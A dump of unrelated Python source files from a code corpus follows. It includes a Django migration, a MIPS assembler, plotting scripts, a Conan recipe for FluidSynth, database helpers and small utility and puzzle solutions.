field=django_fsm.FSMField(choices=[('new', 'New'), ('issues', 'Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the editor', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='edition',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
migrations.AlterField(
model_name='historicalcuration',
name='_status',
field=django_fsm.FSMField(choices=[('new', 'New'), ('incom_materials', 'Incomplete Materials'), ('major_issues', 'Major Issues'), ('minor_issues', 'Minor Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the curator', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='historicalcuration',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
migrations.AlterField(
model_name='historicaledition',
name='_status',
field=django_fsm.FSMField(choices=[('new', 'New'), ('issues', 'Issues'), ('no_issues', 'No Issues')], default='new', help_text='Was the submission approved by the editor', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='historicaledition',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
migrations.AlterField(
model_name='historicalverification',
name='_status',
field=django_fsm.FSMField(choices=[('new', 'New'), ('not_attempted', 'Not Attempted'), ('minor_issues', 'Minor Issues'), ('major_issues', 'Major Issues'), ('success_w_mod', 'Success W Mod'), ('success', 'Success')], default='new', help_text='Was the submission able to be verified', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='historicalverification',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
migrations.AlterField(
model_name='verification',
name='_status',
field=django_fsm.FSMField(choices=[('new', 'New'), ('not_attempted', 'Not Attempted'), ('minor_issues', 'Minor Issues'), ('major_issues', 'Major Issues'), ('success_w_mod', 'Success W Mod'), ('success', 'Success')], default='new', help_text='Was the submission able to be verified', max_length=15, verbose_name='Review'),
),
migrations.AlterField(
model_name='verification',
name='report',
field=models.TextField(default='', verbose_name='Details'),
),
]
|
12,456 | 141c47f9f9a12d70aa0bd918f28739c355b62b53 | #!/usr/bin/env python
import sys
sys.path.insert(1,"/Users/edelman/Documents/programming/alignio-maf")
sys.path.insert(1,"/Users/edelman/Documents/programming/bcbb/gff")
from Bio import AlignIO
from Bio.AlignIO import MafIO
from BCBio import GFF
#mafFile=sys.argv[1]
#gffFile=sys.argv[2]
#sequence=sys.argv[3]
gff = "data/Hmel2.gff"
maf="data/subTree_18Genomes_Hmel201001.maf"
gff_handle = open(gff)
sequence="HmelRef.Hmel201001"
mafIndex=MafIO.MafIndex("trial.mafIndex",maf,sequence)
limit_info = dict(
gff_id = [sequence.split(".")[1]],
gff_type = ["exon"])
mafs=[]
for rec in GFF.parse(gff_handle, limit_info=limit_info):
for i in range(len(rec.features)):
print rec.features[i].location.start, rec.features[i].location.end
#search=mafIndex.search([rec.features[i].location.start],[rec.features[i].location.end])
#for align in search:
# print align
gff_handle.close()
m=mafs[0]
for i,m in enumerate(mafs):
theseMafs=[align for align in m]
AlignIO.write(theseMafs,open("Hmel201001_exonMafs"+str(i)+".maf","w"),"maf")
def getGenes(maf,gff):
feats=GFF.parse()
|
12,457 | ea05f6c995aadc2384a7a23234f0a6eb9c7da631 | import argparse
class Parser:
def __init__(self):
self.result = []
def word(self, input):
"Converts a MIPS 'word' command into binary machine code (as a string)."
if len(input)!= 1:
self.result.append("".join(map(str, input)))
self.result.append(bin(int(input[0]))[2:].zfill(32))
def add(self, input):
"Converts a MIPS 'add' command into binary machine code (as a string)."
if len(input)!= 3:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[1][1:-1]))[2:].zfill(5) + bin(int(input[2][1:]))[2:].zfill(5) + bin(int(input[0][1:-1]))[2:].zfill(5) + "00000100000")
def sub(self, input):
"Converts a MIPS 'sub' command into binary machine code (as a string)."
if len(input)!= 3:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[1][1:-1]))[2:].zfill(5) + bin(int(input[2][1:]))[2:].zfill(5) + bin(int(input[0][1:-1]))[2:].zfill(5) + "00000100010")
def mult(self, input):
"Converts a MIPS 'mult' command into binary machine code (as a string)."
if len(input)!= 2:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:]))[2:].zfill(5) + "00000" + "00000011000")
def multu(self, input):
"Converts a MIPS 'multu' command into binary machine code (as a string)."
if len(input)!= 2:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:]))[2:].zfill(5) + "00000" + "00000011001")
def div(self, input):
"Converts a MIPS 'div' command into binary machine code (as a string)."
if len(input)!= 2:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:]))[2:].zfill(5) + "00000" + "00000011010")
def divu(self, input):
"Converts a MIPS 'divu' command into binary machine code (as a string)."
if len(input)!= 2:
self.result.append("".join(map(str, input)))
self.result.append("000000" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:]))[2:].zfill(5) + "00000" + "00000011011")
def mfhi(self, input):
"Converts a MIPS 'mfhi' command into binary machine code (as a string)."
if len(input)!= 1:
self.result.append("".join(map(str, input)))
self.result.append('0' * 16 + bin(int(input[0][1:]))[2:].zfill(5) + "00000010000")
def mflo(self, input):
"Converts a MIPS 'mflo' command into binary machine code (as a string)."
if len(input)!= 1:
self.result.append("".join(map(str, input)))
self.result.append('0' * 16 + bin(int(input[0][1:]))[2:].zfill(5) + "00000010010")
def lis(self, input):
"Converts a MIPS 'lis' command into binary machine code (as a string)."
if len(input)!= 1:
self.result.append("".join(map(str, input)))
self.result.append('0' * 16 + bin(int(input[0][1:]))[2:].zfill(5) + "00000010100")
def beq(self, input):
"Converts a MIPS 'beq' command into binary machine code (as a string)."
if len(input)!= 3:
self.result.append("".join(map(str, input)))
self.result.append("000100" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:-1]))[2:].zfill(5) + bin(int(input[2]))[2:].zfill(16))
def bne(self, input):
"Converts a MIPS 'bne' command into binary machine code (as a string)."
if len(input)!= 3:
self.result.append("".join(map(str, input)))
self.result.append("000101" + bin(int(input[0][1:-1]))[2:].zfill(5) + bin(int(input[1][1:-1]))[2:].zfill(5) + bin(int(input[2]))[2:].zfill(16))
def jr(self, input):
"Converts a MIPS 'jr' command into binary machine code (as a string)."
if len(input)!= 1:
self.result.append("".join(map(str, input)))
self.result.append('0' * 6 + bin(int(input[0][1:]))[2:].zfill(5) + '0' * 17 + "1000")
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--line', type=str, help="input a line of MIPS code.")
arg_parser.add_argument('--in_file', type=str, help="txt file containing MIPS instructions")
arg_parser.add_argument('--out_file', type=str, help='output to a file instead of std')
args = arg_parser.parse_args()
parser = Parser()
if args.line:
input = args.line.split(' ')
if input[0] == '.word':
input[0] = input[0][1:]
func = getattr(parser, input[0].lower())
func(input[1:])
if args.in_file:
f_in = open(args.in_file, 'r')
for line in f_in:
input = line.split(' ')
if input[0] == '.word':
input[0] = input[0][1:]
func = getattr(parser, input[0].lower())
func(input[1:])
if args.out_file:
f = open(args.out_file, 'w+')
for row in parser.result:
f.write('.word 0x' + str(hex(int(row, 2)))[2:].zfill(8) + '\n')
else:
for row in parser.result:
print('.word 0x' + str(hex(int(row, 2)))[2:].zfill(8)) |
12,458 | 553dccb95df22fa23499923c9e0cf1b9e3d9737a | import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
import numpy as np
f = plt.figure()
ax = f.add_subplot(111)
ax.yaxis.set_ticks_position('both')
ax.xaxis.set_ticks_position('both')
ax.tick_params(which='both', direction='in', labelsize=14)
V4 = (22*60+11)*1.0
V7 = V4/(np.array([15, 14, 15, 21])*60 + np.array([0.055, 0.854, 0.432, 0.746]))
V10 = V4/(np.array([14, 14, 13, 18])*60 + np.array([0.857, 0.857, 0.652, 0.87]))
plt.plot([1, 2, 4, 8], V10, ".", label="V10")
plt.plot([1, 2, 4, 8], V7, "x", label="V7")
plt.xlabel("Nombre de threads", size=20)
plt.ylabel("SpeedUp (par rapport à V4)", size=20)
plt.grid()
plt.legend(loc=2, fontsize=12)
plt.show()
|
12,459 | 8f23895d5d44afe69b8b4bd80c78a3547d9751b2 | import traceback
import os
import sys
import arcpy
from code_library.common import log
from code_library.common import geospatial
from code_library.common import network # need it for network_end_hucs
log.init(arc_script=True,html=True)
layer = arcpy.GetParameterAsText(0)
method = arcpy.GetParameterAsText(1)
output_gdb = arcpy.GetParameterAsText(2)
if not arcpy.Exists(layer):
log.error("Input layer doesn't exist. Problemo cowboy. Please specify some input features and make sure they exist.")
huc12s_index = []
huc10s_index = []
marked_as_bad = []
class huc_issue:
def __init__(self,huc_12 = None,reason = None,issue_notes = None,huc_10 = None, ds = None, ds10 = None):
self.huc_12 = huc_12
self.hu_12_ds = ds
self.huc_10 = huc_10
self.hu_10_ds = ds10
'''items are lists because a huc can end up here for multiple reasons'''
self.reason = [reason]
self.issue_notes = [issue_notes]
issues_index = {}
def check_huc_from_row(row):
global marked_as_bad
global issues_index
'''runs a series of checks on the attributes of each huc'''
huc_12_id = row.getValue("HUC_12") # cache it - we'll use it a bunch right now
huc_12_ds = row.getValue("HU_12_DS")
if not row.getValue("HUC_12"):
return 0
if huc_12_ds not in huc12s_index and huc_12_ds not in network.network_end_hucs:
issue = huc_issue(huc_12_id,"ds_dne","Downstream HUC_12 does not exist in this dataset")
marked_as_bad.append(issue)
issues_index[huc_12_id] = issue
if row.getValue("HU_10_DS") not in huc10s_index and row.getValue("HU_10_DS") not in network.network_end_hucs:
message = "Downstream HUC_10 does not exist in this dataset"
reason = "10_ds_dne"
if huc_12_id in issues_index:
issues_index[huc_12_id].reason.append(reason)
issues_index[huc_12_id].issue_notes.append(message)
else:
issue = huc_issue(huc_12_id,reason,message,huc_10 = row.getValue("HUC_10"))
marked_as_bad.append(issue)
issues_index[huc_12_id] = issue
if row.getValue("HUC_10") not in huc_12_ds and row.getValue("HU_10_DS") not in huc_12_ds:
message = "Downstream HUC_12 is not within the current HUC_10 or the downstream HUC_10 - possible problem with nay of thos attributes"
reason = "ds_not_within"
if huc_12_id in issues_index:
issues_index[huc_12_id].reason.append(reason)
issues_index[huc_12_id].issue_notes.append(message)
else:
issue = huc_issue(huc_12_id,reason,message,huc_10 = row.getValue("HUC_10"))
marked_as_bad.append(issue)
issues_index[huc_12_id] = issue
def check_hucs(feature_class):
pass
def check_boundary_from_row(row, feature_layer):
'''takes the huc, gets the huc 12, does a boundary touches new selection on the feature_layer - returns a huc_issue or True'''
def check_boundaries(feature_class):
'''runs check boundary from row for everything else.'''
pass
def load_features(feature_class):
temp_features = "in_memory/huc_layer"
try:
arcpy.Copy_management(feature_class,temp_features)
except:
log.warning("Couldn't copy features to memory - trying to copy to disk")
original_except = traceback.format_exc()
try:
temp_features= geospatial.generate_gdb_filename(return_full = True)
arcpy.Copy_management(feature_class,temp_features)
except:
log.error("Cant's make a copy of the features - %s" % original_except)
sys.exit()
log.write("Features copied",True)
return temp_features
temp_features = load_features(layer)
huc_curs = arcpy.SearchCursor(temp_features)
for row in huc_curs:
huc12s_index.append(row.getValue("HUC_12"))
huc10s_index.append(row.getValue("HUC_10"))
del huc_curs
check_hucs(temp_features)
if method == "Thorough":
check_boundaries(temp_features)
# now copy the features out
# and then set the output
arcpy.SetParameter(3,output_layer)
|
12,460 | 737fd7c52f40723516ab407386d5bcaa31de4840 | import psycopg2
import yaml
import os
def connect():
config = {}
yml_path = os.path.join(os.path.dirname(__file__), '../../config/db.yml')
with open(yml_path, 'r') as file:
config = yaml.load(file, Loader=yaml.FullLoader)
return psycopg2.connect(dbname=config['database'],
user=config['user'],
password=config['password'],
host=config['host'],
port=config['port'])
def execute_sql_file(path):
full_path = os.path.join(os.path.dirname(__file__), f'../../{path}')
connection = connect()
cursor = connection.cursor()
with open(full_path, "r") as file:
cursor.execute(file.read())
connection.commit()
connection.close()
def execute_get_all(sql, args={}):
connection = connect()
cursor = connection.cursor()
cursor.execute(sql, args)
list_of_tuples = cursor.fetchall()
connection.close()
return list_of_tuples
def execute_get_one(sql, args={}):
connection = connect()
cursor = connection.cursor()
cursor.execute(sql, args)
single_tuple = cursor.fetchone()
connection.close()
return single_tuple
def execute_commit(sql, args={}):
connection = connect()
cursor = connection.cursor()
result = cursor.execute(sql, args)
connection.commit()
connection.close()
return result
|
12,461 | 270d09f67633d22cc6ed8e355f258f1954897979 | import matplotlib.pyplot as plt
def plot_matrix(M, save=False):
plt.imshow(M, interpolation='nearest', aspect='auto', cmap='jet')
plt.show()
if save:
plt.savefig(save)
|
12,462 | 0cb7e6c504eb6980fbe9ad71c39dc29fe9398ca1 | class Solution(object):
def removeElement(self, nums, val):
"""
:type nums: List[int]
:type val: int
:rtype: int
"""
length = len(nums)
if length == 0:
return 0
left = 0
right = length - 1
while left < right:
if nums[left] == val:
while left < right and nums[left] == val:
nums[left], nums[right] = nums[right], nums[left]
right -= 1
else:
left += 1
if nums[left] == val:
return left
else:
return left + 1
if __name__ == '__main__':
solu = Solution()
print solu.removeElement([1, 1, 1, 1], 1)
|
12,463 | 6cd846faf7b04a78097d17f3595c041d9959ffab | # -*- coding: utf-8 -*-
from platinumegg.app.cabaret.views.adminhandler import AdminHandler
from defines import Defines
import settings
from platinumegg.app.cabaret.util.api import BackendApi
from platinumegg.app.cabaret.util.alert import AlertCode
from platinumegg.app.cabaret.models.Memories import MemoriesMaster
class Handler(AdminHandler):
"""動画閲覧数.
"""
def process(self):
movieviewlist = self.procMovieView()
if not movieviewlist:
self.putAlertToHtmlParam(u'見つかりませんでした', AlertCode.WARNING)
self.html_param['movieviewlist'] = movieviewlist
self.writeAppHtml('infomations/view_movieview')
def procMovieView(self):
"""動画閲覧回数.
"""
model_mgr = self.getModelMgr()
movieviewlist = BackendApi.get_movieview_list(model_mgr, using=settings.DB_READONLY)
obj_movieviewlist = self.makeMovieViewObjList(movieviewlist)
return obj_movieviewlist
def makeMovieViewObjList(self, movieviewlist):
"""HTML埋め込み用のオブジェクトに.
"""
model_mgr = self.getModelMgr()
master_idlist = [movieview.id for movieview in movieviewlist]
masters = BackendApi.get_model_dict(model_mgr, MemoriesMaster, master_idlist, using=settings.DB_READONLY)
obj_movieviewlist = []
for movieview in movieviewlist:
obj = self.makeMovieViewObj(movieview, masters.get(movieview.id))
obj_movieviewlist.append(obj)
return obj_movieviewlist
def makeMovieViewObj(self, movieview, memoriesmaster):
"""HTML用のオブジェクトにする.
"""
if memoriesmaster:
name = memoriesmaster.name
text = memoriesmaster.text
else:
name = u'不明'
text = u'不明'
return {
'id' : movieview.id,
'name' : name,
'text' : text,
'cnt' : movieview.cnt,
}
def main(request):
return Handler.run(request)
|
12,464 | 508347317fa73dd398067027657dec618e7acd30 | from pandas_datareader import data
import datetime
import fix_yahoo_finance as yf
yf.pdr_override()
from bokeh.plotting import figure, show, output_file
from bokeh.embed import components
from bokeh.resources import CDN
start=datetime.datetime(2015,11,1)
end=datetime.datetime(2016,3,10)
df=data.get_data_yahoo(tickers="GOOG", start=start, end=end)
def inc_dec(c, o):
if c > o:
value="Increase"
elif c < o:
value="Decrease"
else:
value="Equal"
return value
df["Status"]=[inc_dec(c,o) for c, o in zip(df.Close,df.Open)]
df["Middle"]=(df.Open+df.Close)/2
df["Height"]=abs(df.Close-df.Open)
p=figure(x_axis_type='datetime', width=1000, height=300, sizing_mode="scale_width")
p.title.text="Candlestick Chart"
p.grid.grid_line_alpha=0.3
hours_12=12*60*60*1000
p.segment(df.index, df.High, df.index, df.Low, color="Black")
p.rect(df.index[df.Status=="Increase"],df.Middle[df.Status=="Increase"],
hours_12, df.Height[df.Status=="Increase"],fill_color="#CCFFFF",line_color="black")
p.rect(df.index[df.Status=="Decrease"],df.Middle[df.Status=="Decrease"],
hours_12, df.Height[df.Status=="Decrease"],fill_color="#FF3333",line_color="blac
# to embed graph code to the website
script1, div1 = components(p)
# get the cdns for bokeh graphs to put in the script link
# cdn_js=CDN.js_files # gives list of javascript files
# cdn_css=CDN.css_files # gives list of css files
# while embedding the graph to your website you don't need below 2 lines
output_file("CS.html")
show(p)
|
12,465 | 47389c1dc07c3e49968a3c2e58258a0642f93486 | #coding=utf-8
import requests
for i in xrange(1003):
r= requests.get("http://freeapi.ipip.net/118.28.8.8")
print r.text
|
12,466 | c5cce2008acf99be7559809b3c199846c0009384 | from conans import ConanFile, CMake, tools
import os
import shutil
class FluidSynthConan(ConanFile):
class CustomOption(object):
def __init__(self, name,
values=None,
default=None,
cmake_name=None,
platforms=None,
platforms_blacklist=None,
requirements=None):
self._name = name
self._values = values or [True, False]
self._default = default or False
self._cmake_name = cmake_name or name
self._cmake_name = "enable-" + self._cmake_name
self._platforms_whitelist = platforms
self._platforms_blacklist = platforms_blacklist
self._requirements = requirements or []
@property
def name(self):
return self._name
@property
def cmake_name(self):
return self._cmake_name
@property
def values(self):
return self._values
@property
def default(self):
return self._default
@property
def requirements(self):
return self._requirements
def check_platform(self, the_os):
if self._platforms_whitelist:
return the_os in self._platforms_whitelist
elif self._platforms_blacklist:
return the_os not in self._platforms_blacklist
else:
return True
name = "fluidsynth"
version = "2.0.5"
description = "Software synthesizer based on the SoundFont 2 specifications"
topics = ("conan", "fluidsynth", "soundfont", "midi", "synthesizer")
url = "https://github.com/bincrafters/conan-fluidsynth"
homepage = "http://www.fluidsynth.org/"
license = "LGPL-2.1-only"
exports_sources = ["CMakeLists.txt"]
generators = "cmake", "pkg_config"
settings = "os", "arch", "compiler", "build_type"
conan_options = [CustomOption("shared"),
CustomOption("fPIC", default=True, platforms_blacklist=["Windows"]),
CustomOption("floats"),
CustomOption("fpe-check"),
CustomOption("trap-on-check"),
CustomOption("portaudio", requirements=["portaudio/v190600.20161030@bincrafters/stable"]),
CustomOption("aufile"),
CustomOption("dbus"),
CustomOption("ipv6", default=True),
CustomOption("jack"),
CustomOption("ladspa"),
CustomOption("libsndfile"),
CustomOption("midishare"),
CustomOption("opensles"),
CustomOption("oboe"),
CustomOption("network", default=True),
CustomOption("oss"),
CustomOption("dsound", default=True, platforms=["Windows"]),
CustomOption("waveout", default=True, platforms=["Windows"]),
CustomOption("winmidi", default=True, platforms=["Windows"]),
CustomOption("sdl2", requirements=["sdl2/2.0.9@bincrafters/stable"]),
CustomOption("pkgconfig", default=True),
CustomOption("pulseaudio"),
CustomOption("readline", requirements=["readline/7.0@bincrafters/stable"]),
CustomOption("threads"),
CustomOption("lash", platforms=["Linux", "FreeBSD"]),
CustomOption("alsa", platforms=["Linux", "FreeBSD"], requirements=["libalsa/1.1.9"]),
CustomOption("systemd", platforms=["Linux"]),
CustomOption("coreaudio", default=True, platforms=["Macos"]),
CustomOption("coremidi", default=True, platforms=["Macos"]),
CustomOption("framework", platforms=["Macos"])]
options = {o.name: o.values for o in conan_options}
default_options = {o.name: o.default for o in conan_options}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = "glib/2.58.3@bincrafters/stable"
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def build_requirements(self):
if self.options.pkgconfig:
if not tools.which("pkg-config"):
self.build_requires("pkg-config_installer/0.29.2@bincrafters/stable")
def config_options(self):
for o in self.conan_options:
if not o.check_platform(self.settings.os):
self.options.remove(o.name)
def requirements(self):
for o in self.conan_options:
if o.check_platform(self.settings.os):
if getattr(self.options, o.name):
for r in o.requirements:
self.requires(r)
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = self.name + "-" + self.version
os.rename(extracted_dir, self._source_subfolder)
def _configure_cmake(self):
cmake = CMake(self)
cmake.definitions["enable-debug"] = self.settings.build_type == "Debug"
cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared # fluidsynth forces to True by default
cmake.definitions["enable-tests"] = False
cmake.definitions["LIB_INSTALL_DIR"] = "lib" # https://github.com/FluidSynth/fluidsynth/issues/476
for o in self.conan_options:
if o.check_platform(self.settings.os):
cmake.definitions[o.cmake_name] = getattr(self.options, o.name)
else:
cmake.definitions[o.cmake_name] = False
cmake.configure(build_folder=self._build_subfolder,
source_folder=self._source_subfolder)
return cmake
def _patch_files(self):
cmakelists = os.path.join(self._source_subfolder, "CMakeLists.txt")
# remove some quirks, let conan manage them
tools.replace_in_file(cmakelists, '-fsanitize=undefined', '')
tools.replace_in_file(cmakelists, 'string ( REGEX REPLACE "/MD" "/MT" ${flag_var} "${${flag_var}}" )', '')
tools.replace_in_file(cmakelists, 'set ( CMAKE_POSITION_INDEPENDENT_CODE ${BUILD_SHARED_LIBS} )', '')
# FIXME : components
shutil.copy("glib.pc", "glib-2.0.pc")
shutil.copy("glib.pc", "gthread-2.0.pc")
def build(self):
self._patch_files()
with tools.environment_append({"PKG_CONFIG_PATH": self.source_folder}):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
with tools.environment_append({"PKG_CONFIG_PATH": self.source_folder}):
cmake = self._configure_cmake()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
def package_info(self):
if self.settings.compiler == "Visual Studio":
self.cpp_info.libs = ["fluidsynth" if self.options.shared else "libfluidsynth"]
else:
self.cpp_info.libs = ["fluidsynth"]
if self.settings.os == "Macos":
if self.options.coreaudio:
self.cpp_info.frameworks.extend(
["CoreAudio", "AudioToolbox", "CoreServices"])
if self.options.coremidi:
self.cpp_info.frameworks.append("CoreMidi")
self.cpp_info.sharedlinkflags = self.cpp_info.exelinkflags
if self.settings.os == "Windows":
if self.options.network:
self.cpp_info.system_libs.append("ws2_32")
if self.options.dsound:
self.cpp_info.system_libs.append("dsound")
if self.options.winmidi:
self.cpp_info.system_libs.append("winmm")
|
12,467 | da1bcdc2cd701a758b71e28b701e4d3e7a321ef5 | import os
import glob
from glob import glob
import pandas as pd
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
import enchant
d = enchant.Dict("en_US")
path="/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/"
dirs_names=os.listdir("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_mp4/")
for p in dirs_names:
vs=os.listdir("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_avi/"+p+"/t")
vids=[]
for v in vs:
if ".avi" in v:
n=v.replace(".avi","")
vids.append(n)
df=pd.read_excel("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_mp4/"+p+"/"+p+".xlsx",index_col=False)
name_list=list(df["title"])
desc_list=list(df["description"])
desc_=[]
for v in vids:
for name in range(len(name_list)):
if fuzz.ratio(v ,name_list[name])>90:
spi=str(desc_list[name]).replace("\n"," ")
spi=spi.replace("—"," ")
spi=spi.replace("-"," ")
spi=spi.replace("\t"," ")
spi=spi.replace("—"," ")
spi_list=spi.split(" ")
with open("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/"+str(vids.index(v))+"_desc.txt","w") as f:
for sp in spi_list:
if sp!="" and sp!=" ":
if d.check(sp):
f.write(sp+"\n")
def combine(t1,t3,t4=0,t2=0):
data = data2 = data3 =""
# Reading data from file1
with open(t1) as fp:
data = fp.read()
# Reading data from file2
if t2:
with open(t2) as fp:
data2 = fp.read()
if t4:
with open(t4) as fp:
data3 =fp.read()
print(data)
# Merging 2 files
# To add the data of file2
# from next line
data += "\n"
data += data2 + "\n"
data += data3 + "\n"
with open (t3, 'w') as fp:
fp.write(data)
for p in dirs_names:
print(p)
try:
new_names=[]
vd=[y for x in os.walk("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/") for y in glob(os.path.join(x[0], '*.txt'))]
for i in vd:
s=i.replace("/Volumes/SkAnDH_Xb/final_year_pj/R2_/ads/r2_all_data/"+p+"/","")
s=s.replace("_audio_to_txt.txt","")
s=s.replace("_desc.txt","")
s=s.replace("_objects.txt","")
s=s.replace("_text.txt","")
s=s.replace("_v1.txt","")
s=s.replace("_v2.txt","")
s=s.replace("_v3.txt","")
s=s.replace("_v4.txt","")
s=s.replace("_v5.txt","")
s=s.replace("_v6.txt","")
s=s.replace("_v7.txt","")
new_names.append(s)
set_data=list(set(new_names))
#print(set_data)
for n in set_data:
#V1
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v1.txt")
#V2
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v2.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt")
#V3
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v3.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt")
#V4
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v4.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
#V5
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v5.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt")
#V6
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v6.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_text.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
#V7
combine("/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_desc.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_v7.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_audio_to_txt.txt","/Volumes/SkAnDH_Xb/final_year_pj/R2_ads/r2_all_data/"+p+"/"+n+"_objects.txt")
except :
print(str(p)+str(" "+n))
|
12,468 | 941ab6aa5d434199ab25b0c4aa2a9645d1651cc9 | im=open('evil2.gfx','rb').read()
for i in range(0,5):
open('image' +str(i), 'wb').write(im[i::5])
|
12,469 | e751324c7c073ec668f920678217d931cbd748d4 | """
Tag: array, integer
Given an integer n, return any array containing n unique integers
such that they add up to 0.
Example 1: Input: n = 5 Output: [-7,-1,1,3,4]
Explanation: These arrays also are accepted [-5,-1,1,2,3] , [-3,-1,2,-2,4].
Example 2: Input: n = 3 Output: [-1,0,1]
Example 3: Input: n = 1 Output: [0]
Constraints: 1 <= n <= 1000
"""
from typing import List
class Solution:
def sumZero(self, n: int) -> List[int]:
return list(range(1 - n, n, 2))
assert Solution().sumZero(5) == [-4, -2, 0, 2, 4]
assert Solution().sumZero(3) == [-2, 0, 2]
assert Solution().sumZero(6) == [-5, -3, -1, 1, 3, 5]
print('Tests Passed!!')
|
12,470 | 02da22a179f72654a5f7208ef0dcf2ae4dc6308f | # -*- coding: utf-8 -*-
"""
Created on Mon May 19 21:20:06 2014
@author: Vlad
"""
import numpy as np
import scipy.stats as st
import uncertainties as un
import pint as um
import warnings
DEBUG=False
def ucreate(data,ierr=0.,conf=95.,unit=None):
"""
Creaza un obiect ufloat cu incertitudinea data de intervalul de confidenta
dorit si adauga si incertitudinea instrumentului
Parametrii
----------
data: list, tuble or a numpy array
sirul de date pentru care se calculeaza incertitudinea
ierr: float
eroarea instrumentului la aceeasi confidenta ca si cea actuala
default este zero
conf: float
confidenta pentru care se calculeaza incertitudinea
default=95
unit: pint.Quantity
unitatea de masura pentru variabila care se creaza.
default=None
Intoarce
-------
out: ufloat or pint.Measurement or pint.Quantity
intoarce un float avand si incertitudinea, sau o masuratoare folosind
pachetul pint pentru cantitati fizice
Observatii
-----
Daca data este de tip float sau int intoarce un ufloat cu eroarea data numai
de instrument, sau daca sirul are o deviatie standard egala cu 0.0 atunci intoarce
incertitudinea cu eroarea data de instrument.
In cazul in care data nu este o valoare numerica arunca o exceptie
Daca unit este diferit de None, acesta trebuie sa fie o unitate de masura
definita de pachetul pint si in acest caz se va intoarce un obiect pint.Measurement
References
----------
[1] R. Tatara and G. Lupia, “Assessing heat exchanger performance data
using temperature measurement uncertainty,” Int. J. Eng. Sci. …, vol. 3,
no. 8, pp. 1–12, 2011.
"""
warnings.filterwarnings(action='error')
if isinstance(data,(np.ndarray,list,tuple)):
dta=np.array(data,dtype='f')
else:
if isinstance(data,(float,int)):
return un.ufloat(data,ierr)
else:
raise Exception('valoare numerica')
xm=np.mean(dta)
if dta.size>1:
xstd=np.std(dta,ddof=1)
else:
xstd=0.0
if xstd==0.0 or np.isnan(xstd):
return un.ufloat(xm,ierr)
xskew=st.skew(dta)
